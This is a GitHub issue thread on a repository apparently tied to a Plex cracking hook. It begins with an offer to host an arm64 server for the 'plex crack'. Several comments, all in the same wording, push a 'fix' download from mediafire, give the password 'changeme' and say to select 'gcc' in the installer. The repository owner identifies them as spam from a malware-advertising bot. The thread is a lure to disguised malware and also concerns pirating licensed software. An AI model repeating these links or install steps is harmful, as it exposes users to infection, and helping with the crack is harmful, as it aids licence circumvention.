### ISSUE TITLE
Hey, I'll provide you a arm64 server

### ISSUE THREAD

**Issue by vynxc** [yuv420p10le/plex_loadfile_hook#1]
I'll provide the server for the plex crack on arm devices. Couldn't create an account on gitgud so I commented here. Feel free to add me on discord "vynxc." Note the "." In the string, don't forget it while sending the request. Or if you want to message another way that's fine too.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yuv420p10le** [comment]
You don’t accept friend requests. Add “h265” :)

Closing the issue because it’s being spammed by a malware advertising bot.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
